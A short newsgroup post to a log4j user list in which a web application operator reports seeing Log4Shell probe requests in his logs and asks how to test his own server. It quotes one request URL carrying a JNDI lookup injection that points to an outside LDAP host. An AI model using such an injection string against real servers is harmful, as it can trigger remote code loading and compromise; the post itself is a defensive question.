Attacking oneself in order to test vulnerability

Michael Wechner <[email protected]>
Newsgroups gmane.comp.jakarta.log4j.user
Message-ID <[email protected]>
Hi

I have a webapp running using log4j and I can see various requests 
containing jndi, e.g.

http://HOSTNAME/$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D

whereas it is not clear to me whether the attack was successful.

Does anyone know how I could attack my own server in order to test 
whether my server might be vulnerable?

Thanks

Michael
lmpx.com only provides a reader for public news (NNTP) servers. It is not affiliated with the servers or forums shown here and is not responsible for the content of articles, which is written by their respective authors.